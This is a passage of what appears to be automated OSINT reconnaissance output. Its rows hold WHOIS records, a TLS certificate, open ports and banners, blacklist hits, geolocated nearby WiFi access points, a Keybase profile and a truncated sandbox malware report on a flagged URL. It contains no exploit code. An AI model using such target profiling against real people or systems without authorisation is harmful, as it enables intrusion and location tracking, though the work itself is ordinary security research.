https://darudar.org/users/login/ | login |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RyanLG (Net ID: 00:01:36:4F:9A:F0) | 37.780462,-122.390564 |
| 2023-05-12 02:56:54 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | keyubu.net | cp.keyubu.net |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 34.148.96.0/20 |
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:80 | 188.114.96.0/24 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.92): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14806242598 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/ein_2.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:44:34 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
13:c5:42:8e:df:cd:70:e8:7c:0e:70:c9:5a:83:25:16:cc:62:
c3:f9:d5:c4:22:3b:ce:7f:81:fd:60:05:88:21:1a:e5:70:1c:
36:22:ce:db:ed:26:19:e2:1b:04:4d:ab:65:39:6d:00:51:3b:
cc:9b:3f:79:54:95:3e:31:af:d8:e6:03:1b:cc:d5:95:be:82:
cd:0b:e5:96:8f:6f:35:dd:91:c9:94:47:2b:3a:45:e8:d6:90:
9a:f6:27:ba:63:ff:75:94:72:de:3e:47:3f:d3:d4:41:71:e3:
3f:56:35:21:79:53:05:d2:4b:7c:f6:49:cf:40:3d:7f:f2:f4:
3d:17:14:59:24:3e:50:d8:45:4a:75:44:e1:73:c8:35:32:f2:
12:9e:aa:4b:a4:d5:91:49:4b:5d:ba:80:98:b5:1e:6a:11:cf:
b0:5f:4d:0f:57:ad:69:b3:6b:16:1c:dd:75:b2:fe:57:1f:11:
ae:d7:db:50:93:3c:e1:e8:26:9c:cc:0a:18:7c:b4:5d:5b:33:
d4:f5:18:f8:96:6e:cb:73:1d:80:63:f6:bb:c8:51:5e:dd:31:
fe:d5:d8:6f:b8:13:03:f9:14:44:36:23:9a:a2:41:54:b4:39:
df:20:21:8b:35:e6:b5:0b:7c:63:1f:77:c7:00:93:73:7a:f3:
93:fe:79:56
| battleb0t.xyz |
| 2023-05-12 02:46:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 19, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32.DLL" at base d4980000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base d1700000\n "msedge.exe" loaded module "COMBASE.DLL" at base d4e80000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base badf0000\n "msedge.exe" loaded module "NTDLL.DLL" at base d6d70000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base e1100000\n "msedge.exe" loaded module "SHELL32.DLL" at base d54e0000\n "msedge.exe" loaded module "USER32.DLL" at base d51a0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base d3d00000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base d3d00000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base d48d0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base d3d00000\n "msedge.exe" loaded module "KERNEL32" at base d4980000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base d3d00000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base d3d00000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base d3d00000\n "msedge.exe" loaded module "%PROGRAMFILES%\\(X86)\\MICROSOFT\\EDGE\\APPLICATION\\103.0.1264.37\\MSEDGE.DLL" at base a3ae0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"19001a00b101000040c7e7d3fa7f0000@ntdll.dll"\n "22002300b101000018c7e7d3fa7f0000@ntdll.dll"\n "19001a00b9b0000040c7e7d3fa7f0000@ntdll.dll"\n "22002300b9b0000018c7e7d3fa7f0000@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7692:120:WilError_01"\n "Local\\SM0:7800:120:WilError_01"\n "Local\\SM0:7800:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:7800:120:WilError_01"\n "Local\\SM0:7692:304:WilStaging_02"\n "Local\\SM0:7692:120:WilError_01"\n "SM0:7692:120:WilError_01"\n "SM0:7692:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7692:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7692:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7692:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.43.150:443"\n "185.88.152.184:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-161', u'name': u'Contains ability to modify processes thread functionality (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"OpenThread" [Source: 00000000-00007800.00000000.75750.D4AEF000.00000002.mdmp]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00007692]\n "regex_patterns.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.3\\regex_patterns.json]- [targetUID: 00000000-00007692]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\Trust Protection Lists\\Mu\\LICENSE]- [targetUID: 00000000-00007692]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007692]\n "Session_13322671954908029" has type "data"- [targetUID: N/A]\n "76db8249-b3cb-44da-9551-d0f0664589c0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "8a37d1a7-21d3-4df9-8999-4552124a3857.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\8a37d1a7-21d3-4df9-8999-4552124a3857.tmp]- [targetUID: 00000000-00007692]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7692_1621032304\\auto_open_controller.js]- [targetUID: 00000000-00007692]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007692]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007692]\n "f34135bd94e6cca1_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\f34135bd94e6cca1_0]- [targetUID: 00000000-00007692]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.json]- [targetUID: 00000000-00007692]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007692]\n "shopping.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4292.0\\shopping.html]- [targetUID: 00000000-00007692]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens\\LOG]- [targetUID: 00000000-00007692]\n "b29784eb-2c8c-4cbf-9fa1-0df2e5c685c5.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b29784eb-2c8c-4cbf-9fa1-0df2e5c685c5.tmp]- [targetUID: 00000000-00007692]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\7692_1489057809\\_metadata\\verified_contents.json]- [targetUID: 00000000-00007692]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00007692]\n "f92efea4-e74d-4de9-989f-36e2f1ffd71c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\f92efea4-e74d-4de9-989f-36e2f1ffd71c.tmp]- [targetUID: 00000000-00007692]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-184', u'name': u'Found registry location strings which can modifies auto-execute functionality', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1547/001', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-270', u'attck_id': u'T1547.001', u'relevance': 5, u'threat_level': 0, u'type': 2, u'description': u'Observed string:"software\\microsoft\\windows\\currentversion\\run" [Source: 00000000-00007800.00000000.75750.D4AEF000.00000002.mdmp]\n Observed string:"software\\microsoft\\windows\\currentversion\\runonce" [Source: 00000000-00007800.00000000.75750.D4AEF000.00000002.mdmp]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-4', u'name': u'Found a string that may be used as part of an injection method', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1055/011', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1055.011', u'relevance': 4, u'threat_level': 0, u'type': 2, u'description': u'"Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-143', u'name': u'Contains ability to retreive system language (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1614/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1614.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'descript | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip Wavelan (Net ID: 00:02:2D:01:79:94) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ea2e0298c1146-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 02:53:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.153:80 | 185.199.111.0/24 |
| 2023-05-12 03:10:57 | Raw Data from RIRs | No | Keybase | 0 | 0 | 6 | 0 | None | {u'status': {u'code': 0, u'name': u'OK'}, u'them': [{u'basics': {u'username': u'login', u'track_version': 0, u'ctime': 1437685663, u'last_id_change': 1437685663, u'username_cased': u'login', u'eldest_seqno': 0, u'status': 0, u'id_version': 0, u'mtime': 1565618750, u'salt': u'bfd095bd7481b265726bbe1cf8806782'}, u'devices': {}, u'stellar': {u'hidden': False, u'primary': {}}, u'cryptocurrency_addresses': {}, u'public_keys': {u'eldest_kid': None, u'eldest_key_fingerprint': None, u'families': {}, u'subkeys': [], u'sibkeys': [], u'all_bundles': [], u'pgp_public_keys': []}, u'id': u'428821350e9691491f616b754cd83119', u'proofs_summary': {u'all': [], u'has_web': False, u'by_sig_id': {}, u'by_presentation_group': {}}}]} | login |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.158): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Domains By Proxy, LLC | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
